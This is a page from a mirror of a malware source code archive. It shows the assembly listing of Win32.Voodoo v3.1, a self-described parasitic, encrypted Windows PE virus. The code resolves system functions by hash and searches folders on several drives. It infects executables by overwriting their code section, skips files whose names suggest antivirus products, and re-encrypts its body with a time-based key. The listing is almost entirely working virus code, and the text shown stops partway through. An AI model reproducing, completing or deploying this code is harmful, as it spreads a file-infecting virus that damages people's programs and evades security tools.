mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 01:15:27 +00:00
816 lines
23 KiB
NASM
816 lines
23 KiB
NASM
|
; ============================ Win32.Voodoo_v3.1 ===========================
|
|||
|
; Program : Voodoo v3.1
|
|||
|
; Description : Parasitic,crypt PE virus
|
|||
|
; Last modified : 01.09.1999
|
|||
|
; Purpose : process handling under win32
|
|||
|
; Target OS : Win95/98/NT
|
|||
|
; Notes :
|
|||
|
ImBase equ 00400000h
|
|||
|
Entyp equ 00001000h
|
|||
|
ADDC equ ImBase+Entyp+5
|
|||
|
DiskCount EqU 4
|
|||
|
FileCount EqU 1
|
|||
|
SYSTEM32CRC EQU 04C6D9398h
|
|||
|
.386p
|
|||
|
.model flat
|
|||
|
VirSize EQU offset Voodoo_Ver_3_0E - offset Voodoo_Ver_3_1
|
|||
|
MemSize Equ 2300h
|
|||
|
extrn ExitProcess:PROC
|
|||
|
include win32con.inc ; <20><><EFBFBD>ᠭ<EFBFBD><E1A0AD> consts
|
|||
|
.DATA
|
|||
|
db 0
|
|||
|
flag dd 12345678h
|
|||
|
CheckSum EQU 0B0966F54h
|
|||
|
CheckSum2 EQU 05E5F512Fh
|
|||
|
GlobalAllocCRC EQU 01D2925FEh
|
|||
|
GlobalLockCRC EQU 0BABEC79Dh
|
|||
|
GlobalUnlockCRC EQU 09EA2AB80h
|
|||
|
GlobalFreeCRC EQU 0B3BDC497h
|
|||
|
|
|||
|
CreateFileACRC EQU 0FE222F03h
|
|||
|
CreateFileMappingACRC EQU 0CCF0FBCBh
|
|||
|
MapViewOfFileCRC EQU 0D3DED3B4h
|
|||
|
UnmapViewOfFileCRC EQU 0A5ADAF97h
|
|||
|
FlushViewOfFileCRC EQU 0AFBFBF98h
|
|||
|
ReadFileCRC EQU 0E5E1DAC2h
|
|||
|
|
|||
|
CloseHandleCRC EQU 02731310Dh
|
|||
|
FindFirstFileACRC EQU 0315E6238h
|
|||
|
FindNextFileACRC EQU 0C7F4F8CFh
|
|||
|
SetFileAttributesACRC EQU 0EE2112FBh
|
|||
|
SetFileTimeCRC EQU 012211900h
|
|||
|
GetFileSizeCRC EQU 01E2D17F3h
|
|||
|
GetCommandLineACRC EQU 08CBFBF94h
|
|||
|
lstrcpyACRC EQU 001342E28h
|
|||
|
SetFilePointerCRC EQU 065676742h
|
|||
|
GetCurrentDirectoryCRC EQU 0E012FECDh
|
|||
|
SetCurrentDirectoryCRC EQU 0E012FED9h
|
|||
|
GetSystemTimeCRC EQU 018271EF9h
|
|||
|
_GlobalUnlock EQU 0
|
|||
|
_GlobalFree EQU _GlobalUnlock+4
|
|||
|
_CreateFileA EQU _GlobalFree+4
|
|||
|
_CreateFileMappingA EQU _CreateFileA+4
|
|||
|
_MapViewOfFile EQU _CreateFileMappingA+4
|
|||
|
_UnmapViewOfFile EQU _MapViewOfFile+4
|
|||
|
_FlushViewOfFile EQU _UnmapViewOfFile+4
|
|||
|
_CloseHandle EQU _FlushViewOfFile+4
|
|||
|
_FindFirstFileA EQU _CloseHandle+4
|
|||
|
_FindNextFileA EQU _FindFirstFileA+4
|
|||
|
_SetFileAttributesA EQU _FindNextFileA+4
|
|||
|
_SetFileTime EQU _SetFileAttributesA+4
|
|||
|
_GetFileSize EQU _SetFileTime+4
|
|||
|
_GetCommandLineA EQU _GetFileSize+4
|
|||
|
_ReadFile EQU _GetCommandLineA+4
|
|||
|
_lstrcpyA EQU _ReadFile+4
|
|||
|
_SetFilePointer EQU _lstrcpyA+4
|
|||
|
_GetCurrentDirectory EQU _SetFilePointer+4
|
|||
|
_SetCurrentDirectory EQU _GetCurrentDirectory+4
|
|||
|
_GetSystemTime EQU _SetCurrentDirectory+4
|
|||
|
OldEBP EQU _GetSystemTime+4
|
|||
|
FileSize EQU OldEBP+4
|
|||
|
HhendleOfFile EQU FileSize+4
|
|||
|
HhendleOfMapFile EQU HhendleOfFile+4
|
|||
|
Pointer2MapFile EQU HhendleOfMapFile+4
|
|||
|
tag EQU Pointer2MapFile+4
|
|||
|
SearcHandle EQU tag+2
|
|||
|
SearcHandle2 EQU SearcHandle+4
|
|||
|
systemtime EQU SearcHandle2+4
|
|||
|
CODEBUF EQU systemtime +16
|
|||
|
CommandLine EQU CODEBUF+VirSize
|
|||
|
CurDir EQU CommandLine+800
|
|||
|
CurDir2 EQU CurDir+800
|
|||
|
Win32FindData EQU CurDir2 +800
|
|||
|
CreationTime EQU Win32FindData+4
|
|||
|
LastAccessTime EQU CreationTime+4
|
|||
|
LastWriteTime EQU LastAccessTime+4
|
|||
|
files EQU LastWriteTime+32
|
|||
|
|
|||
|
NumberOfBytesRead EQU MemSize-4
|
|||
|
.CODE
|
|||
|
@Name_Pointers_RVA EQU offset Name_Pointers_RVA - offset EntryPoint_
|
|||
|
@GetProcAddress EQU offset GetProcAddress - offset EntryPoint_
|
|||
|
@KernelHandle EQU offset KernelHandle - offset EntryPoint_
|
|||
|
@_GlobalAlloc EQU offset _GlobalAlloc - offset EntryPoint_
|
|||
|
@_GlobalLock EQU offset _GlobalLock - offset EntryPoint_
|
|||
|
@MemPointer EQU offset MemPointer - offset EntryPoint_
|
|||
|
@NextCode EQU offset NextCode - offset EntryPoint_
|
|||
|
@Dirmask EQU offset Dirmask - offset EntryPoint_
|
|||
|
@mask EQU offset mask - offset EntryPoint_
|
|||
|
@disk EQU offset disk - offset EntryPoint_
|
|||
|
@EntryPointRVA EQU offset EntryPointRVA - offset EntryPoint_
|
|||
|
@ImportTable EQU offset ImportTable - offset EntryPoint_
|
|||
|
@EndImportTable EQU offset EndImportTable - offset EntryPoint_
|
|||
|
Voodoo_Ver_3_1:
|
|||
|
Call EntryPoint_
|
|||
|
EntryPoint_:
|
|||
|
;find MZ in memory
|
|||
|
;----------------------
|
|||
|
popravka EQU offset CryptBegin - offset Voodoo_Ver_3_1
|
|||
|
INCAX EQU offset @INCAX - offset Voodoo_Ver_3_1
|
|||
|
CRCcode EQU offset @CRCcode - offset Voodoo_Ver_3_1
|
|||
|
mov al,00
|
|||
|
call _k
|
|||
|
_k:pop esi
|
|||
|
|
|||
|
mov ecx,VirSize - popravka
|
|||
|
add esi,offset CryptBegin- offset _k ;10h+18+6
|
|||
|
mov ebp,esp
|
|||
|
crypt: xor byte ptr [esi],al
|
|||
|
mov dword ptr [ebp+18],12345678h
|
|||
|
cmp dword ptr [ebp+18+1],12345678h
|
|||
|
jne k
|
|||
|
jmp Voodoo_Ver_3_0E
|
|||
|
k: inc esi
|
|||
|
@INCAX:db 90h, 90h, 90h ;add ax,cx
|
|||
|
loop crypt
|
|||
|
CryptBegin:
|
|||
|
;----------------------
|
|||
|
popravka2 EQU offset CryptBegin2 - offset Voodoo_Ver_3_1
|
|||
|
INCAX2 EQU offset @INCAX2 - offset Voodoo_Ver_3_1
|
|||
|
@CRCcode:
|
|||
|
mov al,00
|
|||
|
call _k2
|
|||
|
_k2:pop esi
|
|||
|
|
|||
|
mov ecx,VirSize - popravka2
|
|||
|
add esi,offset CryptBegin2- offset _k2 ;10h+18+6
|
|||
|
mov ebp,esp
|
|||
|
crypt2: xor byte ptr [esi],al
|
|||
|
mov dword ptr [ebp+18],12345678h
|
|||
|
cmp dword ptr [ebp+18+1],12345678h
|
|||
|
jne k2
|
|||
|
jmp Voodoo_Ver_3_0E
|
|||
|
k2: inc esi
|
|||
|
@INCAX2:db 90h, 90h, 90h ;add ax,cx
|
|||
|
loop crypt2
|
|||
|
CryptBegin2:
|
|||
|
;----------------------
|
|||
|
call _ESI
|
|||
|
_ESI: pop esi
|
|||
|
pop ecx
|
|||
|
call ScanMZ
|
|||
|
; in esi PE header
|
|||
|
add esi,80h
|
|||
|
add edi,dword ptr [esi] ;Import RVA
|
|||
|
jmp @L1
|
|||
|
NotKERNEL32:
|
|||
|
MOV EBX,EBP
|
|||
|
add edi,00014h
|
|||
|
@L1:
|
|||
|
cmp dword ptr [edi+0ch],000000h
|
|||
|
je NOtFound
|
|||
|
add ebx,dword ptr [edi+0ch] ;RVA NAme of dll
|
|||
|
call CRCSum
|
|||
|
cmp eax,CheckSum
|
|||
|
jne NotKERNEL32
|
|||
|
push ebp
|
|||
|
pop esi
|
|||
|
add ESI,DWORD ptr [edi+10h] ;KERNEL32 proc
|
|||
|
mov esi,dword ptr [esi]
|
|||
|
cmp byte ptr [esi+5],0e9h ; win98
|
|||
|
jne Ok_
|
|||
|
add esi,dword ptr [esi+6]
|
|||
|
Ok_:call ScanMZ
|
|||
|
;push EBP ;Hendle of KERNEL32.dll
|
|||
|
add esi,78h
|
|||
|
add edi,dword ptr [esi] ; edi=Export Directory Table RVA
|
|||
|
mov eax,ebp
|
|||
|
add eax,dword ptr [edi+1ch] ; Address Table
|
|||
|
push eax
|
|||
|
mov edx,ebp
|
|||
|
add edx,dword ptr [edi+24h] ; Ordinal Table
|
|||
|
add ebx,dword ptr [edi+20h] ;ebx=Name Pointers RVA
|
|||
|
mov dword ptr [ecx+@Name_Pointers_RVA],ebx
|
|||
|
mov esi,ebx
|
|||
|
push ecx
|
|||
|
mov ecx,dword ptr [edi+18h] ; Num of Name Pointers
|
|||
|
push ecx
|
|||
|
@L2:call ScanNameTable
|
|||
|
cmp eax,CheckSum2
|
|||
|
je FoundGetProcAdr
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
loop @L2
|
|||
|
FoundGetProcAdr:
|
|||
|
pop eax
|
|||
|
sub eax,ecx ; #function
|
|||
|
shl eax,1 ; x2
|
|||
|
; Ordinal Table
|
|||
|
add edx,eax ;
|
|||
|
xor eax,eax
|
|||
|
mov ax,word ptr [edx] ;Ordinal of GetProcAddress
|
|||
|
shl eax,2 ;x4
|
|||
|
pop ecx ;entry
|
|||
|
pop ebx ; offset to Address Table
|
|||
|
add ebx,eax
|
|||
|
mov eax,dword ptr [ebx]
|
|||
|
add eax,ebp
|
|||
|
mov [@GetProcAddress+ecx],eax
|
|||
|
mov [@KernelHandle+ecx],ebp
|
|||
|
mov edx,GlobalAllocCRC
|
|||
|
call CalkProcAdress
|
|||
|
mov [@_GlobalAlloc+ecx],eax
|
|||
|
mov edx,GlobalLockCRC
|
|||
|
call CalkProcAdress
|
|||
|
mov [@_GlobalLock+ecx],eax
|
|||
|
push ecx
|
|||
|
push MemSize
|
|||
|
push 0
|
|||
|
call dword ptr [@_GlobalAlloc+ecx]
|
|||
|
pop ecx
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
call dword ptr [@_GlobalLock+ecx]
|
|||
|
pop ecx
|
|||
|
mov [@MemPointer+ecx],eax
|
|||
|
mov eBX,eax
|
|||
|
mov edi,eax
|
|||
|
mov esi,@ImportTable
|
|||
|
add esi,ecx
|
|||
|
MakeImport:
|
|||
|
mov edx,dword ptr [esi]
|
|||
|
call CalkProcAdress
|
|||
|
cld
|
|||
|
stosd
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
cmp word ptr [esi],6666h
|
|||
|
jne MakeImport
|
|||
|
mov ebp,ecx ; entry !
|
|||
|
;--------------------
|
|||
|
|
|||
|
;####################
|
|||
|
call Infect
|
|||
|
;####################
|
|||
|
mov esi,ebp
|
|||
|
sub esi,5
|
|||
|
mov edi,CODEBUF
|
|||
|
add edi,ebx ;MemPointer
|
|||
|
cld
|
|||
|
mov ecx,VirSize
|
|||
|
rep movsb
|
|||
|
NOtFound:
|
|||
|
cmp [flag],12345678h
|
|||
|
jne Ret2Prog
|
|||
|
push 0
|
|||
|
call ExitProcess
|
|||
|
Ret2Prog: mov [OldEBP+ebx],ebp
|
|||
|
mov esi,ebx
|
|||
|
mov ebp,esi
|
|||
|
add esi,@NextCode+CODEBUF+5
|
|||
|
add ebp,CODEBUF+5
|
|||
|
jmp esi
|
|||
|
NextCode:
|
|||
|
call GetCommandLineA
|
|||
|
mov esi,eax
|
|||
|
cmp byte ptr [esi+1],':' ;for win9x
|
|||
|
je NormalCommandLine
|
|||
|
inc eax
|
|||
|
NormalCommandLine:
|
|||
|
push eax
|
|||
|
mov eax,CommandLine
|
|||
|
add eax,ebx
|
|||
|
push eax
|
|||
|
call lstrcpyA
|
|||
|
mov esi,CommandLine
|
|||
|
add esi,ebx
|
|||
|
push esi
|
|||
|
@L3: inc esi
|
|||
|
cmp byte ptr [esi],'.'
|
|||
|
jne @L3
|
|||
|
mov byte ptr [esi+4],0
|
|||
|
pop eax
|
|||
|
push NULL
|
|||
|
push FILE_ATTRIBUTE_ARCHIVE
|
|||
|
push OPEN_EXISTING
|
|||
|
push NULL
|
|||
|
push FILE_SHARE_READ ;or FILE_SHARE_WRITE
|
|||
|
push GENERIC_READ ;or GENERIC_WRITE
|
|||
|
push eax
|
|||
|
call CreateFileA
|
|||
|
mov [HhendleOfFile+ebx],eax
|
|||
|
push eax
|
|||
|
push NULL
|
|||
|
push eax
|
|||
|
call GetFileSize
|
|||
|
mov edx,eax
|
|||
|
sub edx,VirSize
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
|
|||
|
push 0
|
|||
|
push NULL
|
|||
|
push edx
|
|||
|
push eax
|
|||
|
call SetFilePointer
|
|||
|
pop eax
|
|||
|
mov edx,[ebx+OldEBP]
|
|||
|
sub edx,5
|
|||
|
push edx
|
|||
|
push NULL
|
|||
|
mov ecx,NumberOfBytesRead
|
|||
|
add ecx,ebx
|
|||
|
push ecx
|
|||
|
push VirSize
|
|||
|
push edx
|
|||
|
push eax
|
|||
|
call ReadFile
|
|||
|
pop esi
|
|||
|
call _EDI
|
|||
|
EntryPointRVA: dd 0
|
|||
|
_EDI: pop edi
|
|||
|
add esi,dword ptr [edi]
|
|||
|
jmp esi
|
|||
|
;----------------------------------------------------------
|
|||
|
PushWin32FindData:
|
|||
|
mov edx,Win32FindData
|
|||
|
add edx,ebx
|
|||
|
ret
|
|||
|
InfectDir:
|
|||
|
mov eax,CurDir2
|
|||
|
add eax,ebx
|
|||
|
push eax ;
|
|||
|
push 800
|
|||
|
call GetCurrentDirectory
|
|||
|
call Infect_All_files
|
|||
|
call PushWin32FindData
|
|||
|
push edx
|
|||
|
|
|||
|
mov eax,ebp
|
|||
|
add eax,@Dirmask
|
|||
|
push eax
|
|||
|
call FindFirstFileA
|
|||
|
mov dword ptr [SearcHandle+ebx],eax
|
|||
|
l2: call PushWin32FindData
|
|||
|
push edx
|
|||
|
push dword ptr [SearcHandle+ebx]
|
|||
|
call FindNextFileA
|
|||
|
or eax,eax
|
|||
|
jz ExitFromProcInfectDir
|
|||
|
cmp byte ptr [files+ebx],'.'
|
|||
|
je l2
|
|||
|
mov eax,[Win32FindData+ebx]
|
|||
|
and eax,FILE_ATTRIBUTE_DIRECTORY
|
|||
|
jz l2
|
|||
|
;set new dir
|
|||
|
mov edx,CurDir2
|
|||
|
add edx,ebx
|
|||
|
push edx
|
|||
|
call SetCurrentDirectory
|
|||
|
mov edx,files
|
|||
|
add edx,ebx
|
|||
|
; SYSTEM32 ?
|
|||
|
push ebx
|
|||
|
mov ebx,edx
|
|||
|
call CRCSum
|
|||
|
pop ebx
|
|||
|
cmp eax,SYSTEM32CRC
|
|||
|
je l2 ;DoNotInfect
|
|||
|
push edx
|
|||
|
call SetCurrentDirectory
|
|||
|
call Infect_All_files
|
|||
|
jmp l2
|
|||
|
ExitFromProcInfectDir:
|
|||
|
ret
|
|||
|
;----------------------------------------------------------
|
|||
|
Infect_All_files:
|
|||
|
call PushWin32FindData
|
|||
|
push edx
|
|||
|
mov edx,@mask
|
|||
|
add edx,ebp
|
|||
|
push edx
|
|||
|
xor ecx,ecx
|
|||
|
call FindFirstFileA
|
|||
|
mov dword ptr [SearcHandle2+ebx],eax
|
|||
|
cmp eax,-1
|
|||
|
je l2__
|
|||
|
Next: or eax,eax
|
|||
|
jz l2__
|
|||
|
cmp ecx,FileCount
|
|||
|
jge l2__
|
|||
|
inc ecx
|
|||
|
push ecx
|
|||
|
call InfectFile
|
|||
|
call PushWin32FindData
|
|||
|
push edx
|
|||
|
push dword ptr [SearcHandle2+ebx]
|
|||
|
call FindNextFileA
|
|||
|
pop ecx
|
|||
|
cmp di,9999h
|
|||
|
jne Noerrror
|
|||
|
dec ecx
|
|||
|
xor edi,edi
|
|||
|
Noerrror:
|
|||
|
jmp Next
|
|||
|
l2__: ret
|
|||
|
;-----------------------------------------------------------
|
|||
|
Infect:
|
|||
|
mov eax,CurDir
|
|||
|
add eax,ebx
|
|||
|
push eax ;
|
|||
|
push 800
|
|||
|
call GetCurrentDirectory
|
|||
|
call InfectDir
|
|||
|
mov ecx,DiskCount
|
|||
|
Scan: push ecx
|
|||
|
mov eax,@disk
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
call SetCurrentDirectory
|
|||
|
call InfectDir
|
|||
|
inc byte ptr [@disk+ebp]
|
|||
|
pop ecx
|
|||
|
loop Scan
|
|||
|
mov eax,CurDir
|
|||
|
add eax,ebx
|
|||
|
push eax ;
|
|||
|
call SetCurrentDirectory
|
|||
|
ret
|
|||
|
;----------------------------------------------------------
|
|||
|
InfectFile:
|
|||
|
mov eax,ebx
|
|||
|
add eax,files
|
|||
|
cmp word ptr [eax],'-F' ;F-port
|
|||
|
je @AV
|
|||
|
cmp word ptr [eax],'WA' ; AW ?
|
|||
|
je @AV
|
|||
|
cmp word ptr [eax],'VA' ; AV?????
|
|||
|
je @AV
|
|||
|
cmp word ptr [eax+1],'VA' ;NAV,PAV,RAV,_AVP???
|
|||
|
je @AV
|
|||
|
cmp word ptr [eax+3],'BE' ;drWeb
|
|||
|
je @AV
|
|||
|
cmp word ptr [eax+2],'DN' ;PANDA
|
|||
|
je @AV
|
|||
|
cmp dword ptr [eax],'ITNA';ANTI???
|
|||
|
je @AV
|
|||
|
cmp dword ptr [eax],'FASV';VSAF???
|
|||
|
je @AV
|
|||
|
cmp dword ptr [eax],'PWSV';VSWP???
|
|||
|
je @AV
|
|||
|
cmp dword ptr [eax],'VASF';FSAV???
|
|||
|
je @AV
|
|||
|
|
|||
|
push eax
|
|||
|
push 00000020h
|
|||
|
push eax
|
|||
|
call SetFileAttributesA
|
|||
|
pop eax
|
|||
|
push NULL
|
|||
|
push FILE_ATTRIBUTE_ARCHIVE
|
|||
|
push OPEN_EXISTING
|
|||
|
push NULL
|
|||
|
push FILE_SHARE_READ or FILE_SHARE_WRITE
|
|||
|
push GENERIC_READ or GENERIC_WRITE
|
|||
|
push eax
|
|||
|
call CreateFileA
|
|||
|
cmp eax,-1
|
|||
|
je Error__
|
|||
|
call LoadMemPointer
|
|||
|
mov [HhendleOfFile+ebx],eax
|
|||
|
push ebx
|
|||
|
push NULL
|
|||
|
push eax
|
|||
|
call GetFileSize
|
|||
|
pop ebx
|
|||
|
mov [FileSize+ebx],eax
|
|||
|
Point@ret:push edx
|
|||
|
push eax ; to MApViewofFile
|
|||
|
push NULL
|
|||
|
push eax
|
|||
|
push NULL
|
|||
|
push PAGE_READWRITE
|
|||
|
push NULL
|
|||
|
push dword ptr [HhendleOfFile+ebx]
|
|||
|
call CreateFileMappingA
|
|||
|
mov [HhendleOfMapFile+ebx],eax
|
|||
|
; v steke Size
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push FILE_MAP_WRITE
|
|||
|
push eax
|
|||
|
call MapViewOfFile
|
|||
|
mov [Pointer2MapFile+ebx],eax
|
|||
|
pop edx
|
|||
|
cmp word ptr [tag+ebx],6666h
|
|||
|
je OkOb
|
|||
|
mov esi,eax
|
|||
|
CMP byte ptr [esi+18h],40h
|
|||
|
jl OOO
|
|||
|
cmp dword ptr [esi+3ch],00010000h
|
|||
|
jg OOO
|
|||
|
mov edi,dword ptr [esi+3ch]
|
|||
|
cmp dword ptr [esi+edi],00004550h ;PE Only !
|
|||
|
jne OOO
|
|||
|
cmp dword ptr [esi+6fh],334e4957h ;'WIN3' Infected ?
|
|||
|
je OOO
|
|||
|
;find CODE object
|
|||
|
mov [systemtime+ebx],esi
|
|||
|
;
|
|||
|
add esi,edi
|
|||
|
mov eax,dword ptr [esi+80h] ;Import Table RVA
|
|||
|
push eax
|
|||
|
xor ecx,ecx
|
|||
|
mov cx,word ptr [esi+6h] ;Num of Object
|
|||
|
MOV EDX,DWORD ptr [esi+28h] ; Entry point RVA
|
|||
|
mov dword ptr [ebp+@EntryPointRVA],edx
|
|||
|
mov edx,esi
|
|||
|
mov eax,24
|
|||
|
add ax,word ptr [esi+14h]
|
|||
|
mov edi,esi
|
|||
|
add edi,eax ;edi=Object Table
|
|||
|
pop eax ;Import Table RVA
|
|||
|
pusha
|
|||
|
mov edx,eax
|
|||
|
Find_Import_Table:
|
|||
|
dec ecx
|
|||
|
mov eax,dword ptr [edi+0ch] ; Object RVA
|
|||
|
cmp edx,eax
|
|||
|
jge Mabe
|
|||
|
IncEDI: add edi,28h
|
|||
|
or ecx,ecx
|
|||
|
je Not_Find
|
|||
|
jmp Find_Import_Table
|
|||
|
Mabe: add eax,dword ptr [edi+10h] ; SIZE
|
|||
|
CMP EDX,EAX ; Object RVA =< Import Table RVA =< Object RVA + Phisikal Size
|
|||
|
jle L22
|
|||
|
jmp IncEDI
|
|||
|
L22:
|
|||
|
mov esi,[Pointer2MapFile+ebx]
|
|||
|
push edx
|
|||
|
sub edx,dword ptr [edi+0ch]
|
|||
|
add esi,edx
|
|||
|
mov eax,dword ptr [edi+14h] ;Phis offset
|
|||
|
add esi,eax
|
|||
|
pop edx ; ESI = Phis offset Import Table
|
|||
|
mov ecx,dword ptr [edi+0ch] ; Object RVA
|
|||
|
ECTLI_KERNEL:
|
|||
|
mov edi,dword ptr [esi+0ch] ; EDI=Name RVA
|
|||
|
cmp edi,NULL ;
|
|||
|
je KERNEL_HET
|
|||
|
sub edi,ecx
|
|||
|
add edi,eax ; EAX= Phis offset
|
|||
|
add edi,[Pointer2MapFile+ebx]
|
|||
|
cmp dword ptr [edi],'NREK';KERNEL
|
|||
|
je KERNEL_ECT
|
|||
|
add esi,14h
|
|||
|
jmp ECTLI_KERNEL
|
|||
|
KERNEL_HET:
|
|||
|
Not_Find: popa
|
|||
|
jmp Code_Not_Find
|
|||
|
KERNEL_ECT: popa
|
|||
|
_loop: db 08Bh,47h,24h ;mov eax,dword [edi+024h]
|
|||
|
EXEC_FLAG EQU 20000020h
|
|||
|
and eax,EXEC_FLAG
|
|||
|
jnz Code_Object
|
|||
|
add edi,2ch
|
|||
|
loop _loop
|
|||
|
jmp Code_Not_Find
|
|||
|
Code_Object:
|
|||
|
;chek object size
|
|||
|
cmp dword ptr [edi+10h],VirSize
|
|||
|
jl Code_Not_Find
|
|||
|
push esi
|
|||
|
mov esi,dword ptr [systemtime+ebx]
|
|||
|
mov dword ptr [esi+6fh],334e4957h
|
|||
|
pop esi
|
|||
|
; make writeble
|
|||
|
or dword ptr [edi+24h],80000000h
|
|||
|
mov eax,dword ptr [edi+0ch] ;object RVA
|
|||
|
sub dword ptr [ebp+@EntryPointRVA],eax
|
|||
|
mov dword ptr [edx+28h],eax ; Set New Entry Point RVA
|
|||
|
; save old Programm
|
|||
|
call CloseMapping
|
|||
|
mov word ptr [ebx+tag],06666h
|
|||
|
mov eax,dword ptr [ebx+FileSize]
|
|||
|
push eax
|
|||
|
add eax,VirSize
|
|||
|
jmp Point@ret
|
|||
|
OkOb: mov word ptr [ebx+tag],09999h
|
|||
|
mov esi,dword ptr [edi+14h] ;phisical offset
|
|||
|
add esi,dword ptr [ebx+Pointer2MapFile]
|
|||
|
;add esi,edx
|
|||
|
pop edi
|
|||
|
add edi,dword ptr [ebx+Pointer2MapFile]
|
|||
|
mov ecx,VirSize
|
|||
|
push esi ;CODE
|
|||
|
push esi
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
;write bady to program
|
|||
|
mov esi,ebp
|
|||
|
sub esi,5
|
|||
|
pop edi ; CODE
|
|||
|
mov ecx,VirSize
|
|||
|
cld
|
|||
|
rep movsb
|
|||
|
mov eax,ebx
|
|||
|
add eax,systemtime
|
|||
|
push eax
|
|||
|
call GetSystemTime
|
|||
|
mov ax,word ptr [ebx+systemtime+14]
|
|||
|
pop esi
|
|||
|
mov byte ptr [esi+6],al
|
|||
|
mov byte ptr [esi+CRCcode+1],al ; ?
|
|||
|
mov dword ptr [esi+INCAX],0e2c10366h ;inc ax
|
|||
|
mov dword ptr [esi+INCAX2],0e2c10366h ;inc ax
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
mov ecx,VirSize- popravka2
|
|||
|
add esi,offset CryptBegin2- offset Voodoo_Ver_3_1;
|
|||
|
crypt_2: xor byte ptr [esi],al
|
|||
|
add ax,cx
|
|||
|
inc esi
|
|||
|
loop crypt_2
|
|||
|
pop eax
|
|||
|
POP esi
|
|||
|
mov ecx,VirSize- popravka
|
|||
|
add esi,offset CryptBegin- offset Voodoo_Ver_3_1;2eh+6
|
|||
|
crypt_: xor byte ptr [esi],al
|
|||
|
add ax,cx
|
|||
|
inc esi
|
|||
|
loop crypt_
|
|||
|
|
|||
|
Code_Not_Find:
|
|||
|
OOO2: call CloseMapping
|
|||
|
Error__2: call PushWin32FindData
|
|||
|
push dword ptr [edx]
|
|||
|
mov eax,ebx
|
|||
|
add eax,files
|
|||
|
push eax
|
|||
|
call SetFileAttributesA
|
|||
|
@AV: ret
|
|||
|
OOO: mov di,9999h
|
|||
|
jmp OOO2
|
|||
|
Error__: mov di,9999h
|
|||
|
jmp Error__2
|
|||
|
|
|||
|
;--------------------------------------------------------
|
|||
|
CalkProcAdress: push ecx
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
mov esi,@Name_Pointers_RVA
|
|||
|
add esi,ecx
|
|||
|
mov esi,dword ptr [esi]
|
|||
|
fCRC: call ScanNameTable
|
|||
|
cmp eax,edx
|
|||
|
je foCRC
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
jmp fCRC
|
|||
|
foCRC:
|
|||
|
mov eax,dword ptr [esi]
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
mov eax,@KernelHandle
|
|||
|
add eax,ecx
|
|||
|
push dword ptr [eax]
|
|||
|
call dword ptr [@GetProcAddress+ecx]
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
;--------------------------------------------------------
|
|||
|
ScanNameTable:
|
|||
|
PUSH EBX
|
|||
|
push ecx
|
|||
|
mov ebx,ebp
|
|||
|
add ebx,dword ptr [esi]
|
|||
|
call CRCSum
|
|||
|
pop ecx
|
|||
|
POP EBX
|
|||
|
ret
|
|||
|
;--------------------------------------------------------
|
|||
|
CRCSum: xor eax,eax
|
|||
|
Sum: add eax,dword ptr [ebx]
|
|||
|
cmp byte ptr [ebx+4],0
|
|||
|
je ExitfromCRCSum
|
|||
|
inc ebx
|
|||
|
jmp Sum
|
|||
|
ExitfromCRCSum:
|
|||
|
ret
|
|||
|
;--------------------------------------------------------
|
|||
|
ScanMZ:
|
|||
|
push ecx ; \/
|
|||
|
and si,1111000000000000b
|
|||
|
ScanMZ_:
|
|||
|
sub esi,1000h
|
|||
|
cmp word ptr [esi],'ZM'
|
|||
|
jne ScanMZ_
|
|||
|
mov edi,esi
|
|||
|
mov ebx,esi
|
|||
|
MOV EBP,ESI
|
|||
|
push esi
|
|||
|
cmp dword ptr [esi+3ch],00010000h
|
|||
|
jg NextMZ
|
|||
|
add esi,dword ptr [esi+3ch]
|
|||
|
cmp dword ptr [esi],004550h
|
|||
|
NextMZ:pop esi
|
|||
|
jne ScanMZ_
|
|||
|
add esi,dword ptr [esi+3ch]
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
;---Local ----------
|
|||
|
CloseMapping:
|
|||
|
push edx
|
|||
|
push dword ptr [Pointer2MapFile+ebx]
|
|||
|
call UnmapViewOfFile
|
|||
|
push dword ptr [HhendleOfMapFile+ebx]
|
|||
|
call CloseHandle
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
;--------------------------------------------------------
|
|||
|
LoadMemPointer:
|
|||
|
mov ebx,dword ptr ds:[ebp+@MemPointer]
|
|||
|
ret
|
|||
|
;----Import---------
|
|||
|
GetFileSize: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_GetFileSize]
|
|||
|
CreateFileA: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_CreateFileA]
|
|||
|
CreateFileMappingA:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_CreateFileMappingA]
|
|||
|
MapViewOfFile:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_MapViewOfFile]
|
|||
|
UnmapViewOfFile:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_UnmapViewOfFile]
|
|||
|
FlushViewOfFile:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_FlushViewOfFile]
|
|||
|
CloseHandle: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_CloseHandle]
|
|||
|
GetCommandLineA:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_GetCommandLineA]
|
|||
|
lstrcpyA: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_lstrcpyA]
|
|||
|
ReadFile: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_ReadFile]
|
|||
|
SetFilePointer: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_SetFilePointer]
|
|||
|
FindFirstFileA: call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_FindFirstFileA]
|
|||
|
FindNextFileA: call LoadMemPointer
|
|||
|
